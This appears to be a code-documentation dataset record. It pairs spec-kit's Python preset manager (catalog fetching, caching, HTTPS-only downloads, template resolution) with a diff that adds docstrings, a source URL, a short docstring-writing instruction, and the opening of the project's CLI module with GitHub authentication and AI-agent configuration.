raise PresetError(
f"Failed to fetch preset catalog from {entry.url}: {e}"
)
def _get_merged_packs(self, force_refresh: bool = False) -> Dict[str, Dict[str, Any]]:
active_catalogs = self.get_active_catalogs()
merged: Dict[str, Dict[str, Any]] = {}
for entry in reversed(active_catalogs):
try:
data = self._fetch_single_catalog(entry, force_refresh)
for pack_id, pack_data in data.get("presets", {}).items():
pack_data_with_catalog = {**pack_data, "_catalog_name": entry.name, "_install_allowed": entry.install_allowed}
merged[pack_id] = pack_data_with_catalog
except PresetError:
continue
return merged
def is_cache_valid(self) -> bool:
if not self.cache_file.exists() or not self.cache_metadata_file.exists():
return False
try:
metadata = json.loads(self.cache_metadata_file.read_text())
cached_at = datetime.fromisoformat(metadata.get("cached_at", ""))
if cached_at.tzinfo is None:
cached_at = cached_at.replace(tzinfo=timezone.utc)
age_seconds = (
datetime.now(timezone.utc) - cached_at
).total_seconds()
return age_seconds < self.CACHE_DURATION
except (json.JSONDecodeError, ValueError, KeyError, TypeError):
return False
def fetch_catalog(self, force_refresh: bool = False) -> Dict[str, Any]:
catalog_url = self.get_catalog_url()
if not force_refresh and self.is_cache_valid():
try:
metadata = json.loads(self.cache_metadata_file.read_text())
if metadata.get("catalog_url") == catalog_url:
return json.loads(self.cache_file.read_text())
except (json.JSONDecodeError, OSError):
# Cache is corrupt or unreadable; fall through to network fetch
pass
try:
import urllib.request
import urllib.error
with urllib.request.urlopen(catalog_url, timeout=10) as response:
catalog_data = json.loads(response.read())
if (
"schema_version" not in catalog_data
or "presets" not in catalog_data
):
raise PresetError("Invalid preset catalog format")
self.cache_dir.mkdir(parents=True, exist_ok=True)
self.cache_file.write_text(json.dumps(catalog_data, indent=2))
metadata = {
"cached_at": datetime.now(timezone.utc).isoformat(),
"catalog_url": catalog_url,
}
self.cache_metadata_file.write_text(
json.dumps(metadata, indent=2)
)
return catalog_data
except (ImportError, Exception) as e:
if isinstance(e, PresetError):
raise
raise PresetError(
f"Failed to fetch preset catalog from {catalog_url}: {e}"
)
def search(
self,
query: Optional[str] = None,
tag: Optional[str] = None,
author: Optional[str] = None,
) -> List[Dict[str, Any]]:
try:
packs = self._get_merged_packs()
except PresetError:
return []
results = []
for pack_id, pack_data in packs.items():
if author and pack_data.get("author", "").lower() != author.lower():
continue
if tag and tag.lower() not in [
t.lower() for t in pack_data.get("tags", [])
]:
continue
if query:
query_lower = query.lower()
searchable_text = " ".join(
[
pack_data.get("name", ""),
pack_data.get("description", ""),
pack_id,
]
+ pack_data.get("tags", [])
).lower()
if query_lower not in searchable_text:
continue
results.append({**pack_data, "id": pack_id})
return results
def get_pack_info(
self, pack_id: str
) -> Optional[Dict[str, Any]]:
try:
packs = self._get_merged_packs()
except PresetError:
return None
if pack_id in packs:
return {**packs[pack_id], "id": pack_id}
return None
def download_pack(
self, pack_id: str, target_dir: Optional[Path] = None
) -> Path:
import urllib.request
import urllib.error
pack_info = self.get_pack_info(pack_id)
if not pack_info:
raise PresetError(
f"Preset '{pack_id}' not found in catalog"
)
if not pack_info.get("_install_allowed", True):
catalog_name = pack_info.get("_catalog_name", "unknown")
raise PresetError(
f"Preset '{pack_id}' is from the '{catalog_name}' catalog which does not allow installation. "
f"Use --from with the preset's repository URL instead."
)
download_url = pack_info.get("download_url")
if not download_url:
raise PresetError(
f"Preset '{pack_id}' has no download URL"
)
from urllib.parse import urlparse
parsed = urlparse(download_url)
is_localhost = parsed.hostname in ("localhost", "127.0.0.1", "::1")
if parsed.scheme != "https" and not (
parsed.scheme == "http" and is_localhost
):
raise PresetError(
f"Preset download URL must use HTTPS: {download_url}"
)
if target_dir is None:
target_dir = self.cache_dir / "downloads"
target_dir.mkdir(parents=True, exist_ok=True)
version = pack_info.get("version", "unknown")
zip_filename = f"{pack_id}-{version}.zip"
zip_path = target_dir / zip_filename
try:
with urllib.request.urlopen(download_url, timeout=60) as response:
zip_data = response.read()
zip_path.write_bytes(zip_data)
return zip_path
except urllib.error.URLError as e:
raise PresetError(
f"Failed to download preset from {download_url}: {e}"
)
except IOError as e:
raise PresetError(f"Failed to save preset ZIP: {e}")
def clear_cache(self):
if self.cache_dir.exists():
for f in self.cache_dir.iterdir():
if f.is_file() and f.name.startswith("catalog"):
f.unlink(missing_ok=True)
class PresetResolver:
def __init__(self, project_root: Path):
self.project_root = project_root
self.templates_dir = project_root / ".specify" / "templates"
self.presets_dir = project_root / ".specify" / "presets"
self.overrides_dir = self.templates_dir / "overrides"
self.extensions_dir = project_root / ".specify" / "extensions"
def _get_all_extensions_by_priority(self) -> list[tuple[int, str, dict | None]]:
if not self.extensions_dir.exists():
return []
registry = ExtensionRegistry(self.extensions_dir)
registered_extensions = registry.list_by_priority()
registered_extension_ids = {ext_id for ext_id, _ in registered_extensions}
all_extensions: list[tuple[int, str, dict | None]] = []
for ext_id, metadata in registered_extensions:
priority = normalize_priority(metadata.get("priority") if metadata else None)
all_extensions.append((priority, ext_id, metadata))
# Add unregistered directories with implicit priority=10
for ext_dir in self.extensions_dir.iterdir():
if not ext_dir.is_dir() or ext_dir.name.startswith("."):
continue
if ext_dir.name not in registered_extension_ids:
all_extensions.append((10, ext_dir.name, None))
# Sort by (priority, ext_id) for deterministic ordering
all_extensions.sort(key=lambda x: (x[0], x[1]))
return all_extensions
def resolve(
self,
template_name: str,
template_type: str = "template",
) -> Optional[Path]:
# Determine subdirectory based on template type
if template_type == "template":
subdirs = ["templates", ""]
elif template_type == "command":
subdirs = ["commands"]
elif template_type == "script":
subdirs = ["scripts"]
else:
subdirs = [""]
# Determine file extension based on template type
ext = ".md"
if template_type == "script":
ext = ".sh" # scripts use .sh; callers can also check .ps1
# Priority 1: Project-local overrides
if template_type == "script":
override = self.overrides_dir / "scripts" / f"{template_name}{ext}"
else:
override = self.overrides_dir / f"{template_name}{ext}"
if override.exists():
return override
# Priority 2: Installed presets (sorted by priority — lower number wins)
if self.presets_dir.exists():
registry = PresetRegistry(self.presets_dir)
for pack_id, _metadata in registry.list_by_priority():
pack_dir = self.presets_dir / pack_id
for subdir in subdirs:
if subdir:
candidate = pack_dir / subdir / f"{template_name}{ext}"
else:
candidate = pack_dir / f"{template_name}{ext}"
if candidate.exists():
return candidate
# Priority 3: Extension-provided templates (sorted by priority — lower number wins)
for _priority, ext_id, _metadata in self._get_all_extensions_by_priority():
ext_dir = self.extensions_dir / ext_id
if not ext_dir.is_dir():
continue
for subdir in subdirs:
if subdir:
candidate = ext_dir / subdir / f"{template_name}{ext}"
else:
candidate = ext_dir / f"{template_name}{ext}"
if candidate.exists():
return candidate
# Priority 4: Core templates
if template_type == "template":
core = self.templates_dir / f"{template_name}.md"
if core.exists():
return core
elif template_type == "command":
core = self.templates_dir / "commands" / f"{template_name}.md"
if core.exists():
return core
elif template_type == "script":
core = self.templates_dir / "scripts" / f"{template_name}{ext}"
if core.exists():
return core
return None
def resolve_with_source(
self,
template_name: str,
template_type: str = "template",
) -> Optional[Dict[str, str]]:
# Delegate to resolve() for the actual lookup, then determine source
resolved = self.resolve(template_name, template_type)
if resolved is None:
return None
resolved_str = str(resolved)
# Determine source attribution
if str(self.overrides_dir) in resolved_str:
return {"path": resolved_str, "source": "project override"}
if str(self.presets_dir) in resolved_str and self.presets_dir.exists():
registry = PresetRegistry(self.presets_dir)
for pack_id, _metadata in registry.list_by_priority():
pack_dir = self.presets_dir / pack_id
try:
resolved.relative_to(pack_dir)
meta = registry.get(pack_id)
version = meta.get("version", "?") if meta else "?"
return {
"path": resolved_str,
"source": f"{pack_id} v{version}",
}
except ValueError:
continue
for _priority, ext_id, ext_meta in self._get_all_extensions_by_priority():
ext_dir = self.extensions_dir / ext_id
if not ext_dir.is_dir():
continue
try:
resolved.relative_to(ext_dir)
if ext_meta:
version = ext_meta.get("version", "?")
return {
"path": resolved_str,
"source": f"extension:{ext_id} v{version}",
}
else:
return {
"path": resolved_str,
"source": f"extension:{ext_id} (unregistered)",
}
except ValueError:
continue
return {"path": resolved_str, "source": "core"} | --- +++ @@ -1,3 +1,11 @@+"""
+Preset Manager for Spec Kit
+
+Handles installation, removal, and management of Spec Kit presets.
+Presets are self-contained, versioned collections of templates
+(artifact, command, and script templates) that can be installed to
+customize the Spec-Driven Development workflow.
+"""
import copy
import json
@@ -21,6 +29,7 @@
@dataclass
class PresetCatalogEntry:
+ """Represents a single entry in the preset catalog stack."""
url: str
name: str
priority: int
@@ -29,14 +38,17 @@
class PresetError(Exception):
+ """Base exception for preset-related errors."""
pass
class PresetValidationError(PresetError):
+ """Raised when preset manifest validation fails."""
pass
class PresetCompatibilityError(PresetError):
+ """Raised when preset is incompatible with current environment."""
pass
@@ -44,16 +56,26 @@
class PresetManifest:
+ """Represents and validates a preset manifest (preset.yml)."""
SCHEMA_VERSION = "1.0"
REQUIRED_FIELDS = ["schema_version", "preset", "requires", "provides"]
def __init__(self, manifest_path: Path):
+ """Load and validate preset manifest.
+
+ Args:
+ manifest_path: Path to preset.yml file
+
+ Raises:
+ PresetValidationError: If manifest is invalid
+ """
self.path = manifest_path
self.data = self._load_yaml(manifest_path)
self._validate()
def _load_yaml(self, path: Path) -> dict:
+ """Load YAML file safely."""
try:
with open(path, 'r') as f:
return yaml.safe_load(f) or {}
@@ -63,6 +85,7 @@ raise PresetValidationError(f"Manifest not found: {path}")
def _validate(self):
+ """Validate manifest structure and required fields."""
# Check required top-level fields
for field in self.REQUIRED_FIELDS:
if field not in self.data:
@@ -145,52 +168,68 @@
@property
def id(self) -> str:
+ """Get preset ID."""
return self.data["preset"]["id"]
@property
def name(self) -> str:
+ """Get preset name."""
return self.data["preset"]["name"]
@property
def version(self) -> str:
+ """Get preset version."""
return self.data["preset"]["version"]
@property
def description(self) -> str:
+ """Get preset description."""
return self.data["preset"]["description"]
@property
def author(self) -> str:
+ """Get preset author."""
return self.data["preset"].get("author", "")
@property
def requires_speckit_version(self) -> str:
+ """Get required spec-kit version range."""
return self.data["requires"]["speckit_version"]
@property
def templates(self) -> List[Dict[str, Any]]:
+ """Get list of provided templates."""
return self.data["provides"]["templates"]
@property
def tags(self) -> List[str]:
+ """Get preset tags."""
return self.data.get("tags", [])
def get_hash(self) -> str:
+ """Calculate SHA256 hash of manifest file."""
with open(self.path, 'rb') as f:
return f"sha256:{hashlib.sha256(f.read()).hexdigest()}"
class PresetRegistry:
+ """Manages the registry of installed presets."""
REGISTRY_FILE = ".registry"
SCHEMA_VERSION = "1.0"
def __init__(self, packs_dir: Path):
+ """Initialize registry.
+
+ Args:
+ packs_dir: Path to .specify/presets/ directory
+ """
self.packs_dir = packs_dir
self.registry_path = packs_dir / self.REGISTRY_FILE
self.data = self._load()
def _load(self) -> dict:
+ """Load registry from disk."""
if not self.registry_path.exists():
return {
"schema_version": self.SCHEMA_VERSION,
@@ -207,11 +246,18 @@ }
def _save(self):
+ """Save registry to disk."""
self.packs_dir.mkdir(parents=True, exist_ok=True)
with open(self.registry_path, 'w') as f:
json.dump(self.data, f, indent=2)
def add(self, pack_id: str, metadata: dict):
+ """Add preset to registry.
+
+ Args:
+ pack_id: Preset ID
+ metadata: Pack metadata (version, source, etc.)
+ """
self.data["presets"][pack_id] = {
**metadata,
"installed_at": datetime.now(timezone.utc).isoformat()
@@ -219,11 +265,29 @@ self._save()
def remove(self, pack_id: str):
+ """Remove preset from registry.
+
+ Args:
+ pack_id: Preset ID
+ """
if pack_id in self.data["presets"]:
del self.data["presets"][pack_id]
self._save()
def update(self, pack_id: str, updates: dict):
+ """Update preset metadata in registry.
+
+ Merges the provided updates with the existing entry, preserving any
+ fields not specified. The installed_at timestamp is always preserved
+ from the original entry.
+
+ Args:
+ pack_id: Preset ID
+ updates: Partial metadata to merge into existing metadata
+
+ Raises:
+ KeyError: If preset is not installed
+ """
if pack_id not in self.data["presets"]:
raise KeyError(f"Preset '{pack_id}' not found in registry")
existing = self.data["presets"][pack_id]
@@ -243,12 +307,35 @@ self._save()
def get(self, pack_id: str) -> Optional[dict]:
+ """Get preset metadata from registry.
+
+ Args:
+ pack_id: Preset ID
+
+ Returns:
+ Pack metadata or None if not found
+ """
return self.data["presets"].get(pack_id)
def list(self) -> Dict[str, dict]:
+ """Get all installed presets.
+
+ Returns:
+ Dictionary of pack_id -> metadata
+ """
return self.data["presets"]
def list_by_priority(self) -> List[tuple]:
+ """Get all installed presets sorted by priority.
+
+ Lower priority number = higher precedence (checked first).
+ Presets with equal priority are sorted alphabetically by ID
+ for deterministic ordering.
+
+ Returns:
+ List of (pack_id, metadata_copy) tuples sorted by priority.
+ Metadata is deep-copied to prevent accidental mutation.
+ """
packs = self.data.get("presets", {}) or {}
if not isinstance(packs, dict):
packs = {}
@@ -265,12 +352,26 @@ )
def is_installed(self, pack_id: str) -> bool:
+ """Check if preset is installed.
+
+ Args:
+ pack_id: Preset ID
+
+ Returns:
+ True if pack is installed
+ """
return pack_id in self.data["presets"]
class PresetManager:
+ """Manages preset lifecycle: installation, removal, updates."""
def __init__(self, project_root: Path):
+ """Initialize preset manager.
+
+ Args:
+ project_root: Path to project root directory
+ """
self.project_root = project_root
self.presets_dir = project_root / ".specify" / "presets"
self.registry = PresetRegistry(self.presets_dir)
@@ -280,6 +381,18 @@ manifest: PresetManifest,
speckit_version: str
) -> bool:
+ """Check if preset is compatible with current spec-kit version.
+
+ Args:
+ manifest: Preset manifest
+ speckit_version: Current spec-kit version
+
+ Returns:
+ True if compatible
+
+ Raises:
+ PresetCompatibilityError: If pack is incompatible
+ """
required = manifest.requires_speckit_version
current = pkg_version.Version(speckit_version)
@@ -303,6 +416,19 @@ manifest: PresetManifest,
preset_dir: Path
) -> Dict[str, List[str]]:
+ """Register preset command overrides with all detected AI agents.
+
+ Scans the preset's templates for type "command", reads each command
+ file, and writes it to every detected agent directory using the
+ CommandRegistrar from the agents module.
+
+ Args:
+ manifest: Preset manifest
+ preset_dir: Installed preset directory
+
+ Returns:
+ Dictionary mapping agent names to lists of registered command names
+ """
command_templates = [
t for t in manifest.templates if t.get("type") == "command"
]
@@ -336,6 +462,11 @@ )
def _unregister_commands(self, registered_commands: Dict[str, List[str]]) -> None:
+ """Remove previously registered command files from agent directories.
+
+ Args:
+ registered_commands: Dict mapping agent names to command name lists
+ """
try:
from .agents import CommandRegistrar
except ImportError:
@@ -345,6 +476,16 @@ registrar.unregister_commands(registered_commands, self.project_root)
def _get_skills_dir(self) -> Optional[Path]:
+ """Return the skills directory if ``--ai-skills`` was used during init.
+
+ Reads ``.specify/init-options.json`` to determine whether skills
+ are enabled and which agent was selected, then delegates to
+ the module-level ``_get_skills_dir()`` helper for the concrete path.
+
+ Returns:
+ The skills directory ``Path``, or ``None`` if skills were not
+ enabled or the init-options file is missing.
+ """
from . import load_init_options, _get_skills_dir
opts = load_init_options(self.project_root)
@@ -366,6 +507,22 @@ manifest: "PresetManifest",
preset_dir: Path,
) -> List[str]:
+ """Generate SKILL.md files for preset command overrides.
+
+ For every command template in the preset, checks whether a
+ corresponding skill already exists in any detected skills
+ directory. If so, the skill is overwritten with content derived
+ from the preset's command file. This ensures that presets that
+ override commands also propagate to the agentskills.io skill
+ layer when ``--ai-skills`` was used during project initialisation.
+
+ Args:
+ manifest: Preset manifest.
+ preset_dir: Installed preset directory.
+
+ Returns:
+ List of skill names that were written (for registry storage).
+ """
command_templates = [
t for t in manifest.templates if t.get("type") == "command"
]
@@ -468,6 +625,16 @@ return written
def _unregister_skills(self, skill_names: List[str], preset_dir: Path) -> None:
+ """Restore original SKILL.md files after a preset is removed.
+
+ For each skill that was overridden by the preset, attempts to
+ regenerate the skill from the core command template. If no core
+ template exists, the skill directory is removed.
+
+ Args:
+ skill_names: List of skill names written by the preset.
+ preset_dir: The preset's installed directory (may already be deleted).
+ """
if not skill_names:
return
@@ -549,6 +716,20 @@ speckit_version: str,
priority: int = 10,
) -> PresetManifest:
+ """Install preset from a local directory.
+
+ Args:
+ source_dir: Path to preset directory
+ speckit_version: Current spec-kit version
+ priority: Resolution priority (lower = higher precedence, default 10)
+
+ Returns:
+ Installed preset manifest
+
+ Raises:
+ PresetValidationError: If manifest is invalid or priority is invalid
+ PresetCompatibilityError: If pack is incompatible
+ """
# Validate priority
if priority < 1:
raise PresetValidationError("Priority must be a positive integer (1 or higher)")
@@ -594,6 +775,20 @@ speckit_version: str,
priority: int = 10,
) -> PresetManifest:
+ """Install preset from ZIP file.
+
+ Args:
+ zip_path: Path to preset ZIP file
+ speckit_version: Current spec-kit version
+ priority: Resolution priority (lower = higher precedence, default 10)
+
+ Returns:
+ Installed preset manifest
+
+ Raises:
+ PresetValidationError: If manifest is invalid or priority is invalid
+ PresetCompatibilityError: If pack is incompatible
+ """
# Validate priority early
if priority < 1:
raise PresetValidationError("Priority must be a positive integer (1 or higher)")
@@ -631,6 +826,14 @@ return self.install_from_directory(pack_dir, speckit_version, priority)
def remove(self, pack_id: str) -> bool:
+ """Remove an installed preset.
+
+ Args:
+ pack_id: Preset ID
+
+ Returns:
+ True if pack was removed
+ """
if not self.registry.is_installed(pack_id):
return False
@@ -653,6 +856,11 @@ return True
def list_installed(self) -> List[Dict[str, Any]]:
+ """List all installed presets with metadata.
+
+ Returns:
+ List of preset metadata dictionaries
+ """
result = []
for pack_id, metadata in self.registry.list().items():
@@ -691,6 +899,14 @@ return result
def get_pack(self, pack_id: str) -> Optional[PresetManifest]:
+ """Get manifest for an installed preset.
+
+ Args:
+ pack_id: Preset ID
+
+ Returns:
+ Preset manifest or None if not installed
+ """
if not self.registry.is_installed(pack_id):
return None
@@ -704,12 +920,22 @@
class PresetCatalog:
+ """Manages preset catalog fetching, caching, and searching.
+
+ Supports multi-catalog stacks with priority-based resolution,
+ mirroring the extension catalog system.
+ """
DEFAULT_CATALOG_URL = "https://raw.githubusercontent.com/github/spec-kit/main/presets/catalog.json"
COMMUNITY_CATALOG_URL = "https://raw.githubusercontent.com/github/spec-kit/main/presets/catalog.community.json"
CACHE_DURATION = 3600 # 1 hour in seconds
def __init__(self, project_root: Path):
+ """Initialize preset catalog manager.
+
+ Args:
+ project_root: Root directory of the spec-kit project
+ """
self.project_root = project_root
self.presets_dir = project_root / ".specify" / "presets"
self.cache_dir = self.presets_dir / ".cache"
@@ -717,6 +943,14 @@ self.cache_metadata_file = self.cache_dir / "catalog-metadata.json"
def _validate_catalog_url(self, url: str) -> None:
+ """Validate that a catalog URL uses HTTPS (localhost HTTP allowed).
+
+ Args:
+ url: URL to validate
+
+ Raises:
+ PresetValidationError: If URL is invalid or uses non-HTTPS scheme
+ """
from urllib.parse import urlparse
parsed = urlparse(url)
@@ -734,6 +968,19 @@ )
def _load_catalog_config(self, config_path: Path) -> Optional[List[PresetCatalogEntry]]:
+ """Load catalog stack configuration from a YAML file.
+
+ Args:
+ config_path: Path to preset-catalogs.yml
+
+ Returns:
+ Ordered list of PresetCatalogEntry objects, or None if file
+ doesn't exist or contains no valid catalog entries.
+
+ Raises:
+ PresetValidationError: If any catalog entry has an invalid URL,
+ the file cannot be parsed, or a priority value is invalid.
+ """
if not config_path.exists():
return None
try:
@@ -786,6 +1033,20 @@ return entries if entries else None
def get_active_catalogs(self) -> List[PresetCatalogEntry]:
+ """Get the ordered list of active preset catalogs.
+
+ Resolution order:
+ 1. SPECKIT_PRESET_CATALOG_URL env var — single catalog replacing all defaults
+ 2. Project-level .specify/preset-catalogs.yml
+ 3. User-level ~/.specify/preset-catalogs.yml
+ 4. Built-in default stack (default + community)
+
+ Returns:
+ List of PresetCatalogEntry objects sorted by priority (ascending)
+
+ Raises:
+ PresetValidationError: If a catalog URL is invalid
+ """
import sys
# 1. SPECKIT_PRESET_CATALOG_URL env var replaces all defaults
@@ -821,10 +1082,26 @@ ]
def get_catalog_url(self) -> str:
+ """Get the primary catalog URL.
+
+ Returns the URL of the highest-priority catalog. Kept for backward
+ compatibility. Use get_active_catalogs() for full multi-catalog support.
+
+ Returns:
+ URL of the primary catalog
+ """
active = self.get_active_catalogs()
return active[0].url if active else self.DEFAULT_CATALOG_URL
def _get_cache_paths(self, url: str):
+ """Get cache file paths for a given catalog URL.
+
+ For the DEFAULT_CATALOG_URL, uses legacy cache files for backward
+ compatibility. For all other URLs, uses URL-hash-based cache files.
+
+ Returns:
+ Tuple of (cache_file_path, cache_metadata_path)
+ """
if url == self.DEFAULT_CATALOG_URL:
return self.cache_file, self.cache_metadata_file
url_hash = hashlib.sha256(url.encode()).hexdigest()[:16]
@@ -834,6 +1111,7 @@ )
def _is_url_cache_valid(self, url: str) -> bool:
+ """Check if cached catalog for a specific URL is still valid."""
cache_file, metadata_file = self._get_cache_paths(url)
if not cache_file.exists() or not metadata_file.exists():
return False
@@ -850,6 +1128,18 @@ return False
def _fetch_single_catalog(self, entry: PresetCatalogEntry, force_refresh: bool = False) -> Dict[str, Any]:
+ """Fetch a single catalog with per-URL caching.
+
+ Args:
+ entry: PresetCatalogEntry describing the catalog to fetch
+ force_refresh: If True, bypass cache
+
+ Returns:
+ Catalog data dictionary
+
+ Raises:
+ PresetError: If catalog cannot be fetched
+ """
cache_file, metadata_file = self._get_cache_paths(entry.url)
if not force_refresh and self._is_url_cache_valid(entry.url):
@@ -889,6 +1179,13 @@ )
def _get_merged_packs(self, force_refresh: bool = False) -> Dict[str, Dict[str, Any]]:
+ """Fetch and merge presets from all active catalogs.
+
+ Higher-priority catalogs (lower priority number) win on ID conflicts.
+
+ Returns:
+ Merged dictionary of pack_id -> pack_data
+ """
active_catalogs = self.get_active_catalogs()
merged: Dict[str, Dict[str, Any]] = {}
@@ -904,6 +1201,11 @@ return merged
def is_cache_valid(self) -> bool:
+ """Check if cached catalog is still valid.
+
+ Returns:
+ True if cache exists and is within cache duration
+ """
if not self.cache_file.exists() or not self.cache_metadata_file.exists():
return False
@@ -920,6 +1222,17 @@ return False
def fetch_catalog(self, force_refresh: bool = False) -> Dict[str, Any]:
+ """Fetch preset catalog from URL or cache.
+
+ Args:
+ force_refresh: If True, bypass cache and fetch from network
+
+ Returns:
+ Catalog data dictionary
+
+ Raises:
+ PresetError: If catalog cannot be fetched
+ """
catalog_url = self.get_catalog_url()
if not force_refresh and self.is_cache_valid():
@@ -970,6 +1283,19 @@ tag: Optional[str] = None,
author: Optional[str] = None,
) -> List[Dict[str, Any]]:
+ """Search catalog for presets.
+
+ Searches across all active catalogs (merged by priority) so that
+ community and custom catalogs are included in results.
+
+ Args:
+ query: Search query (searches name, description, tags)
+ tag: Filter by specific tag
+ author: Filter by author name
+
+ Returns:
+ List of matching preset metadata
+ """
try:
packs = self._get_merged_packs()
except PresetError:
@@ -1007,6 +1333,16 @@ def get_pack_info(
self, pack_id: str
) -> Optional[Dict[str, Any]]:
+ """Get detailed information about a specific preset.
+
+ Searches across all active catalogs (merged by priority).
+
+ Args:
+ pack_id: ID of the preset
+
+ Returns:
+ Pack metadata or None if not found
+ """
try:
packs = self._get_merged_packs()
except PresetError:
@@ -1019,6 +1355,18 @@ def download_pack(
self, pack_id: str, target_dir: Optional[Path] = None
) -> Path:
+ """Download preset ZIP from catalog.
+
+ Args:
+ pack_id: ID of the preset to download
+ target_dir: Directory to save ZIP file (defaults to cache directory)
+
+ Returns:
+ Path to downloaded ZIP file
+
+ Raises:
+ PresetError: If pack not found or download fails
+ """
import urllib.request
import urllib.error
@@ -1075,6 +1423,7 @@ raise PresetError(f"Failed to save preset ZIP: {e}")
def clear_cache(self):
+ """Clear all catalog cache files, including per-URL hashed caches."""
if self.cache_dir.exists():
for f in self.cache_dir.iterdir():
if f.is_file() and f.name.startswith("catalog"):
@@ -1082,8 +1431,21 @@
class PresetResolver:
+ """Resolves template names to file paths using a priority stack.
+
+ Resolution order:
+ 1. .specify/templates/overrides/ - Project-local overrides
+ 2. .specify/presets/<preset-id>/ - Installed presets
+ 3. .specify/extensions/<ext-id>/templates/ - Extension-provided templates
+ 4. .specify/templates/ - Core templates (shipped with Spec Kit)
+ """
def __init__(self, project_root: Path):
+ """Initialize preset resolver.
+
+ Args:
+ project_root: Path to project root directory
+ """
self.project_root = project_root
self.templates_dir = project_root / ".specify" / "templates"
self.presets_dir = project_root / ".specify" / "presets"
@@ -1091,6 +1453,15 @@ self.extensions_dir = project_root / ".specify" / "extensions"
def _get_all_extensions_by_priority(self) -> list[tuple[int, str, dict | None]]:
+ """Build unified list of registered and unregistered extensions sorted by priority.
+
+ Registered extensions use their stored priority; unregistered directories
+ get implicit priority=10. Results are sorted by (priority, ext_id) for
+ deterministic ordering.
+
+ Returns:
+ List of (priority, ext_id, metadata_or_none) tuples sorted by priority.
+ """
if not self.extensions_dir.exists():
return []
@@ -1120,6 +1491,17 @@ template_name: str,
template_type: str = "template",
) -> Optional[Path]:
+ """Resolve a template name to its file path.
+
+ Walks the priority stack and returns the first match.
+
+ Args:
+ template_name: Template name (e.g., "spec-template")
+ template_type: Template type ("template", "command", or "script")
+
+ Returns:
+ Path to the resolved template file, or None if not found
+ """
# Determine subdirectory based on template type
if template_type == "template":
subdirs = ["templates", ""]
@@ -1190,6 +1572,15 @@ template_name: str,
template_type: str = "template",
) -> Optional[Dict[str, str]]:
+ """Resolve a template name and return source attribution.
+
+ Args:
+ template_name: Template name (e.g., "spec-template")
+ template_type: Template type ("template", "command", or "script")
+
+ Returns:
+ Dictionary with 'path' and 'source' keys, or None if not found
+ """
# Delegate to resolve() for the actual lookup, then determine source
resolved = self.resolve(template_name, template_type)
if resolved is None:
@@ -1236,4 +1627,4 @@ except ValueError:
continue
- return {"path": resolved_str, "source": "core"}+ return {"path": resolved_str, "source": "core"}
| https://raw.githubusercontent.com/github/spec-kit/HEAD/src/specify_cli/presets.py |
Create documentation strings for testing functions | #!/usr/bin/env python3
# /// script
# requires-python = ">=3.11"
# dependencies = [
# "typer",
# "rich",
# "platformdirs",
# "readchar",
# "httpx",
# "json5",
# ]
# ///
import os
import subprocess
import sys
import zipfile
import tempfile
import shutil
import shlex
import json
import json5
import stat
import yaml
from pathlib import Path
from typing import Any, Optional, Tuple
import typer
import httpx
from rich.console import Console
from rich.panel import Panel
from rich.progress import Progress, SpinnerColumn, TextColumn
from rich.text import Text
from rich.live import Live
from rich.align import Align
from rich.table import Table
from rich.tree import Tree
from typer.core import TyperGroup
# For cross-platform keyboard input
import readchar
import ssl
import truststore
from datetime import datetime, timezone
ssl_context = truststore.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client = httpx.Client(verify=ssl_context)
def _github_token(cli_token: str | None = None) -> str | None:
return ((cli_token or os.getenv("GH_TOKEN") or os.getenv("GITHUB_TOKEN") or "").strip()) or None
def _github_auth_headers(cli_token: str | None = None) -> dict:
token = _github_token(cli_token)
return {"Authorization": f"Bearer {token}"} if token else {}
def _parse_rate_limit_headers(headers: httpx.Headers) -> dict:
info = {}
# Standard GitHub rate-limit headers
if "X-RateLimit-Limit" in headers:
info["limit"] = headers.get("X-RateLimit-Limit")
if "X-RateLimit-Remaining" in headers:
info["remaining"] = headers.get("X-RateLimit-Remaining")
if "X-RateLimit-Reset" in headers:
reset_epoch = int(headers.get("X-RateLimit-Reset", "0"))
if reset_epoch:
reset_time = datetime.fromtimestamp(reset_epoch, tz=timezone.utc)
info["reset_epoch"] = reset_epoch
info["reset_time"] = reset_time
info["reset_local"] = reset_time.astimezone()
# Retry-After header (seconds or HTTP-date)
if "Retry-After" in headers:
retry_after = headers.get("Retry-After")
try:
info["retry_after_seconds"] = int(retry_after)
except ValueError:
# HTTP-date format - not implemented, just store as string
info["retry_after"] = retry_after
return info
def _format_rate_limit_error(status_code: int, headers: httpx.Headers, url: str) -> str:
rate_info = _parse_rate_limit_headers(headers)
lines = [f"GitHub API returned status {status_code} for {url}"]
lines.append("")
if rate_info:
lines.append("[bold]Rate Limit Information:[/bold]")
if "limit" in rate_info:
lines.append(f" • Rate Limit: {rate_info['limit']} requests/hour")
if "remaining" in rate_info:
lines.append(f" • Remaining: {rate_info['remaining']}")
if "reset_local" in rate_info:
reset_str = rate_info["reset_local"].strftime("%Y-%m-%d %H:%M:%S %Z")
lines.append(f" • Resets at: {reset_str}")
if "retry_after_seconds" in rate_info:
lines.append(f" • Retry after: {rate_info['retry_after_seconds']} seconds")
lines.append("")
# Add troubleshooting guidance
lines.append("[bold]Troubleshooting Tips:[/bold]")
lines.append(" • If you're on a shared CI or corporate environment, you may be rate-limited.")
lines.append(" • Consider using a GitHub token via --github-token or the GH_TOKEN/GITHUB_TOKEN")
lines.append(" environment variable to increase rate limits.")
lines.append(" • Authenticated requests have a limit of 5,000/hour vs 60/hour for unauthenticated.")
return "\n".join(lines)
# Agent configuration with name, folder, install URL, CLI tool requirement, and commands subdirectory
AGENT_CONFIG = {
"copilot": {
"name": "GitHub Copilot",
"folder": ".github/",
"commands_subdir": "agents", # Special: uses agents/ not commands/
"install_url": None, # IDE-based, no CLI check needed
"requires_cli": False,
},
"claude": {
"name": "Claude Code",
"folder": ".claude/",
"commands_subdir": "commands",
"install_url": "https://docs.anthropic.com/en/docs/claude-code/setup",
"requires_cli": True,
},
"gemini": {
"name": "Gemini CLI",
"folder": ".gemini/",
"commands_subdir": "commands",
"install_url": "https://github.com/google-gemini/gemini-cli",
"requires_cli": True,
},
"cursor-agent": {
"name": "Cursor",
"folder": ".cursor/",
"commands_subdir": "commands",
"install_url": None, # IDE-based
"requires_cli": False,
},
"qwen": {
"name": "Qwen Code",
"folder": ".qwen/",
"commands_subdir": "commands",
"install_url": "https://github.com/QwenLM/qwen-code",
"requires_cli": True,
},
"opencode": {
"name": "opencode",
"folder": ".opencode/",
"commands_subdir": "command", # Special: singular 'command' not 'commands'
"install_url": "https://opencode.ai",
"requires_cli": True,
},
"codex": {
"name": "Codex CLI",
"folder": ".codex/",
"commands_subdir": "prompts", # Special: uses prompts/ not commands/
"install_url": "https://github.com/openai/codex",
